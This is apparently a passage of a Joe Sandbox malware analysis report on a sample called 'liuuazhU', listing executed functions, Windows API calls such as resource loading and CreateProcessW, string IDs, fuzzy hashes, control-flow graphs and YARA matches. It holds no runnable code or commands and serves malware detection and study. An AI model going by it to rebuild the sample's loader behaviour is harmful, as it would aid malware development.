44961->44958 44962->44959 44964 2e7c4b44 44963->44964

                                                                                        Executed Functions

                                                                                        Function 2E4C21F8 Relevance: 12.2, Strings: 9, Instructions: 910COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                        • API String ID: 0-2735749406
                                                                                        • Opcode ID: 16e756d392f5cd396b0362851c50de72699b4be0102c4c1725e0d9eb9bb221c3
                                                                                        • Instruction ID: 647e32adea0085dbbb334bfe107042fb25fbf92048711d6f43094e9ad306bff1
                                                                                        • Opcode Fuzzy Hash: 16e756d392f5cd396b0362851c50de72699b4be0102c4c1725e0d9eb9bb221c3
                                                                                        • Instruction Fuzzy Hash: 56826B38A00A09CFCB05CF68C584A9EBBF2BF58B14F15955AE809DB365D7B0ED41CB54
                                                                                        Function 2E425F38 Relevance: 1.9, APIs: 1, Instructions: 374libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3119790903.000000002E420000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E420000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e420000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: c12f6f33b2302193eb533bdf3f16e3ba7e1df37ba17af4ff4975f43a781d0c0a
                                                                                        • Instruction ID: dd64dc4f120fb4f63e794863ed7083c239b6188ccec644b1c762d68dd80b1037
                                                                                        • Opcode Fuzzy Hash: c12f6f33b2302193eb533bdf3f16e3ba7e1df37ba17af4ff4975f43a781d0c0a
                                                                                        • Instruction Fuzzy Hash: EC02A174E01218CFDB14DFA9D884B9DBBB2BF88304F10D1AAE508AB355DB75A985CF50
                                                                                        Function 2E7CF791 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120196643.000000002E7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E7C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e7c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a830069eb10a6669d1f7b5bb31c29c2fd2268dc19aa95b78f15318fac2b869fd
                                                                                        • Instruction ID: f5bd1fcf63c9ad95b4ed4e62e5fd5c8826c518c97b1ec8cdcf20b08ba9fa9ca4
                                                                                        • Opcode Fuzzy Hash: a830069eb10a6669d1f7b5bb31c29c2fd2268dc19aa95b78f15318fac2b869fd
                                                                                        • Instruction Fuzzy Hash: 2FC138B1D053489FCF16CFA5C890ACDBFF5AF1A310F15A09AE448AB226D7359A85CF11
                                                                                        Function 2E824AD1 Relevance: 1.8, APIs: 1, Instructions: 329COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120296894.000000002E820000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E820000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e820000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fbab556190fc12967ddc34ff8d5eb12e22610405a894a78be8123c6105fba139
                                                                                        • Instruction ID: b5ee51179791416480c68bade22dae1c311d267802ecf2459ca3cf8628ca1be1
                                                                                        • Opcode Fuzzy Hash: fbab556190fc12967ddc34ff8d5eb12e22610405a894a78be8123c6105fba139
                                                                                        • Instruction Fuzzy Hash: C8D19030A00A49CFDB04CFA9C898B9DBBF1BFA4314F158168E449AF2A5DB74D985CF50
                                                                                        Function 2D94D2E8 Relevance: 1.8, APIs: 1, Instructions: 303processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,00000000,2D94D94A), ref: 2D94E5F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3119074821.000000002D940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D940000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2d940000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 0114fc08ebd1fefbc1999c925f89ad9e75d65d85989e4982073f8006f2226e94
                                                                                        • Instruction ID: f4e87f3b18400632d0bcb777b95b15fd9e87987034820d55f98b4d7893271351
                                                                                        • Opcode Fuzzy Hash: 0114fc08ebd1fefbc1999c925f89ad9e75d65d85989e4982073f8006f2226e94
                                                                                        • Instruction Fuzzy Hash: 95C1C074D00218DFDB11CFA9C880BAEBBF6BF49304F2491A9E508B7261E774A985CF45
                                                                                        Function 2E425D18 Relevance: 1.8, APIs: 1, Instructions: 263libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3119790903.000000002E420000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E420000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e420000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 7de691fc1c7688f521c2d0adbc1c79b2e857cc1609d04c7760d183bc788a6da8
                                                                                        • Instruction ID: 041df0b9a58e7bcfa387173ea55ba1b365dc64ccb0c4054a8f4aac52d6f2cf2f
                                                                                        • Opcode Fuzzy Hash: 7de691fc1c7688f521c2d0adbc1c79b2e857cc1609d04c7760d183bc788a6da8
                                                                                        • Instruction Fuzzy Hash: E891E371E00A19CBCB14DFBAC96069EBBF2EF98310F10857AD405A7395DB389D01CB91
                                                                                        Function 2D94E7C0 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForInputIdle.USER32(?,?), ref: 2D94E864
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3119074821.000000002D940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D940000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2d940000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: IdleInputWait
                                                                                        • String ID:
                                                                                        • API String ID: 2200289081-0
                                                                                        • Opcode ID: c4c44217fac2431d6a7bed3b76b78d616b8a35620cd3b0c082dfe0e1e68ec273
                                                                                        • Instruction ID: f073cac3f389127b2be91f4aee4caf5bc5665761bf03be7c3d76b8ee9cfbc029
                                                                                        • Opcode Fuzzy Hash: c4c44217fac2431d6a7bed3b76b78d616b8a35620cd3b0c082dfe0e1e68ec273
                                                                                        • Instruction Fuzzy Hash: 9231B9B4D002589FCB10CFAAC984A9EFBF5BB49300F20902AE408BB355D774A945CF58
                                                                                        Function 2E4CF570 Relevance: 1.5, Strings: 1, Instructions: 227COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8DC.
                                                                                        • API String ID: 0-1690975047
                                                                                        • Opcode ID: 0a0eeacab5c479fd9d665ecbbcb21aaa321fc170294a7620e9ae0934b0239dbc
                                                                                        • Instruction ID: 543fc3fd5fa09a80f8746302e5b4e9159b87b59852c3178ff4970cc4566628b4
                                                                                        • Opcode Fuzzy Hash: 0a0eeacab5c479fd9d665ecbbcb21aaa321fc170294a7620e9ae0934b0239dbc
                                                                                        • Instruction Fuzzy Hash: 52B1A174E012298FEB24CF6AC944BDDBBF2BF99300F10D1AAD508A7254DB745A85CF11
                                                                                        Function 2E4CF560 Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8DC.
                                                                                        • API String ID: 0-1690975047
                                                                                        • Opcode ID: 69f35cdc2e689e435736be7ca7bd1d9324ac20e40c6feaba8da7d9f1981e16ae
                                                                                        • Instruction ID: be277e92aa022027dc9ecb12ac5efe0379ed2c700e6eed57711dee3b89ac583b
                                                                                        • Opcode Fuzzy Hash: 69f35cdc2e689e435736be7ca7bd1d9324ac20e40c6feaba8da7d9f1981e16ae
                                                                                        • Instruction Fuzzy Hash: 7271A374E016288FEB68CF6AC854B9DBBF2AF89300F14C1AAD548A7254DB744A85CF51
                                                                                        Function 2E4CE388 Relevance: .8, Instructions: 780COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 10f853b27bb31684e47301dfa28ab4b0bad1b90c360f5b7766970720c7b063d7
                                                                                        • Instruction ID: ff208400831998d962137456825b4e44671ce29be823872b4334a056e8807e83
                                                                                        • Opcode Fuzzy Hash: 10f853b27bb31684e47301dfa28ab4b0bad1b90c360f5b7766970720c7b063d7
                                                                                        • Instruction Fuzzy Hash: 2282CE74E052298FDB64DF69C894BEDBBB2AB59300F1091EAD50CA7351EB349E81CF50
                                                                                        Function 2E4C5420 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3881b3c2cedc86361593a1ecc808b658c2905305b913b416fe01f637d8085194
                                                                                        • Instruction ID: 2fa8641254d724fdaf835f330c75b1cbb6b7ec4355f21e89e65e736152ac8aec
                                                                                        • Opcode Fuzzy Hash: 3881b3c2cedc86361593a1ecc808b658c2905305b913b416fe01f637d8085194
                                                                                        • Instruction Fuzzy Hash: 90F18A74E002288FDB64DFA5C990BEDBBB2AB98300F2085AAD50DA7355DB355E85CF50
                                                                                        Function 2E4CE379 Relevance: .2, Instructions: 188COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a45afbb3e25a85a9fa09c92553a7d34dd290f457f7ea5d7eb47050ee3c68ac6d
                                                                                        • Instruction ID: 65f1f71988240ae90273e32102af1bd4f4e2d09f696135d4ca6dbfd99f75d390
                                                                                        • Opcode Fuzzy Hash: a45afbb3e25a85a9fa09c92553a7d34dd290f457f7ea5d7eb47050ee3c68ac6d
                                                                                        • Instruction Fuzzy Hash: DD819074E052288FDB64DF66C9507EDBBF2AF89300F1091AAD50DA7251DB359E82CF50
                                                                                        Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                        • _getenv.LIBCMT ref: 00401ABA
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                        • Module32First.KERNEL32 ref: 00401C48
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 00401DC4
                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                        • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                        • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                        • _malloc.LIBCMT ref: 00401EBA
                                                                                        • _memset.LIBCMT ref: 00401EDD
                                                                                        • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000B.00000001.1965196360.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000B.00000001.1965196360.000000000043C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_1_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                        • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                        • API String ID: 1430744539-2962942730
                                                                                        • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                        • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                        • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                        • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                        Function 2E4C32D0 Relevance: 24.6, Strings: 19, Instructions: 826COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 682 2e4c32d0-2e4c37be 757 2e4c37c4-2e4c37d4 682->757 758 2e4c3d10-2e4c3d33 682->758 757->758 759 2e4c37da-2e4c37ea 757->759 762 2e4c3d54-2e4c3d6f 758->762 763 2e4c3d36-2e4c3d45 758->763 759->758 761 2e4c37f0-2e4c3800 759->761 761->758 764 2e4c3806-2e4c3816 761->764 775 2e4c3de6-2e4c3df2 762->775 776 2e4c3d71-2e4c3d7b 762->776 765 2e4c3d47-2e4c3d4c 763->765 766 2e4c3d51 763->766 764->758 767 2e4c381c-2e4c382c 764->767 768 2e4c3e36-2e4c3e3b 765->768 766->762 767->758 769 2e4c3832-2e4c3842 767->769 769->758 771 2e4c3848-2e4c3858 769->771 771->758 772 2e4c385e-2e4c386e 771->772 772->758 774 2e4c3874-2e4c3884 772->774 774->758 777 2e4c388a-2e4c389a 774->777 782 2e4c3e09-2e4c3e15 775->782 783 2e4c3df4-2e4c3e00 775->783 776->775 781 2e4c3d7d-2e4c3d89 776->781 777->758 778 2e4c38a0-2e4c3d0f 777->778 791 2e4c3dae-2e4c3db1 781->791 792 2e4c3d8b-2e4c3d96 781->792 788 2e4c3e2c-2e4c3e2e 782->788 789 2e4c3e17-2e4c3e23 782->789 783->782 793 2e4c3e02-2e4c3e07 783->793 788->768 789->788 802 2e4c3e25-2e4c3e2a 789->802 794 2e4c3dc8-2e4c3dd4 791->794 795 2e4c3db3-2e4c3dbf 791->795 792->791 804 2e4c3d98-2e4c3da2 792->804 793->768 797 2e4c3e3c-2e4c3e98 call 2e4c4001 794->797 798 2e4c3dd6-2e4c3ddd 794->798 795->794 805 2e4c3dc1-2e4c3dc6 795->805 816 2e4c3e9a-2e4c3ea5 797->816 817 2e4c3eab-2e4c3eb6 797->817 798->797 803 2e4c3ddf-2e4c3de4 798->803 802->768 803->768 804->791 811 2e4c3da4-2e4c3da9 804->811 805->768 811->768 816->817 821 2e4c3f2e-2e4c3f80 816->821 822 2e4c3ebc-2e4c3f19 817->822 823 2e4c3f87-2e4c3fc3 817->823 821->823 832 2e4c3f22-2e4c3f2b 822->832 836 2e4c3fca-2e4c3fcc 823->836 837 2e4c3fc5 call 2e4c2d48 823->837 839 2e4c3fdd-2e4c3feb 836->839 840 2e4c3fce-2e4c3fdb 836->840 837->836 847 2e4c3fed-2e4c3ff7 839->847 848 2e4c3ff9 839->848 846 2e4c3ffb-2e4c3ffe 840->846 847->846 848->846
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $C.$(%C.$(o^q$,$C.$4%C.$8$C.$@%C.$D$C.$L%C.$P$C.$X%C.$\$C.$d%C.$h$C.$p%C.$$C.$$C.$$^q$$^q
                                                                                        • API String ID: 0-2478616931
                                                                                        • Opcode ID: e01baf92386f6882779007963e2f00d3ad6006c4fff224c3b122fd81a8e43af4
                                                                                        • Instruction ID: d1d154a7095021c0efc97555545ca9975fc0e5adb5d565c5bb0dc667621a1a89
                                                                                        • Opcode Fuzzy Hash: e01baf92386f6882779007963e2f00d3ad6006c4fff224c3b122fd81a8e43af4
                                                                                        • Instruction Fuzzy Hash: 58723674A00218CFDB14DFA4C8A0B9EBB76EF98300F2481AAD41AAB395DF359D45DF51
                                                                                        Function 0040CBF7 Relevance: 21.1, APIs: 14, Instructions: 78COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000B.00000001.1965196360.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000B.00000001.1965196360.000000000043C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_1_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
                                                                                        • String ID:
                                                                                        • API String ID: 2598563909-0
                                                                                        • Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                        • Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
                                                                                        • Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
                                                                                        • Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C
                                                                                        Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                        • GetLastError.KERNEL32 ref: 00401940
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000B.00000001.1965196360.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000B.00000001.1965196360.000000000043C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_1_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3322701435-0
                                                                                        • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                        • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                        • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                        • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                        Function 2E7C49D0 Relevance: 6.1, APIs: 4, Instructions: 136threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1783 2e7c49d0-2e7c4a6f call 2e7c7820 GetCurrentProcess 1789 2e7c4a78-2e7c4aac GetCurrentThread 1783->1789 1790 2e7c4a71-2e7c4a77 1783->1790 1791 2e7c4aae-2e7c4ab4 1789->1791 1792 2e7c4ab5-2e7c4ae9 GetCurrentProcess 1789->1792 1790->1789 1791->1792 1793 2e7c4aeb-2e7c4af1 1792->1793 1794 2e7c4af2-2e7c4b0d call 2e7c4bb0 1792->1794 1793->1794 1798 2e7c4b13-2e7c4b42 GetCurrentThreadId 1794->1798 1799 2e7c4b4b-2e7c4bad 1798->1799 1800 2e7c4b44-2e7c4b4a 1798->1800 1800->1799
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 2E7C4A5E
                                                                                        • GetCurrentThread.KERNEL32 ref: 2E7C4A9B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 2E7C4AD8
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 2E7C4B31
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120196643.000000002E7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E7C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e7c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 9fa1fc5be6c3f23d474634e39080f65f630017d5457f6299840970126de0546c
                                                                                        • Instruction ID: a41f48d340a881e60f9f63e9673cb5d02ba5a343b088aedc3e37b2a4867f9813
                                                                                        • Opcode Fuzzy Hash: 9fa1fc5be6c3f23d474634e39080f65f630017d5457f6299840970126de0546c
                                                                                        • Instruction Fuzzy Hash: 6B516AB09007098FDB04DFA9D588BDEBBF5EF88314F20C12AD518A7260DB349984CF65
                                                                                        Function 2E7C49E0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1808 2e7c49e0-2e7c4a6f GetCurrentProcess 1812 2e7c4a78-2e7c4aac GetCurrentThread 1808->1812 1813 2e7c4a71-2e7c4a77 1808->1813 1814 2e7c4aae-2e7c4ab4 1812->1814 1815 2e7c4ab5-2e7c4ae9 GetCurrentProcess 1812->1815 1813->1812 1814->1815 1816 2e7c4aeb-2e7c4af1 1815->1816 1817 2e7c4af2-2e7c4b0d call 2e7c4bb0 1815->1817 1816->1817 1821 2e7c4b13-2e7c4b42 GetCurrentThreadId 1817->1821 1822 2e7c4b4b-2e7c4bad 1821->1822 1823 2e7c4b44-2e7c4b4a 1821->1823 1823->1822
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 2E7C4A5E
                                                                                        • GetCurrentThread.KERNEL32 ref: 2E7C4A9B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 2E7C4AD8
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 2E7C4B31
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120196643.000000002E7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E7C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e7c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: f20fda1b29fa90adfd1801b26ed3a5f5ba83276c60a302f8ce9260816d71b93d
                                                                                        • Instruction ID: 65967268f1f659eeacc7cdf8bfed029587620e892ec6b63990b65e93f778ee7d
                                                                                        • Opcode Fuzzy Hash: f20fda1b29fa90adfd1801b26ed3a5f5ba83276c60a302f8ce9260816d71b93d
                                                                                        • Instruction Fuzzy Hash: 5F5158B09007098FDB04DFA9D588BDEFBF5AB88314F20C12AE519A7360DB349984CF65
                                                                                        Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 0040AF80
                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                          • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000B.00000001.1965196360.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000B.00000001.1965196360.000000000043C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_1_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1411284514-0
                                                                                        • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                        • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                        • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                        • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                        Function 2E4CD3E8 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
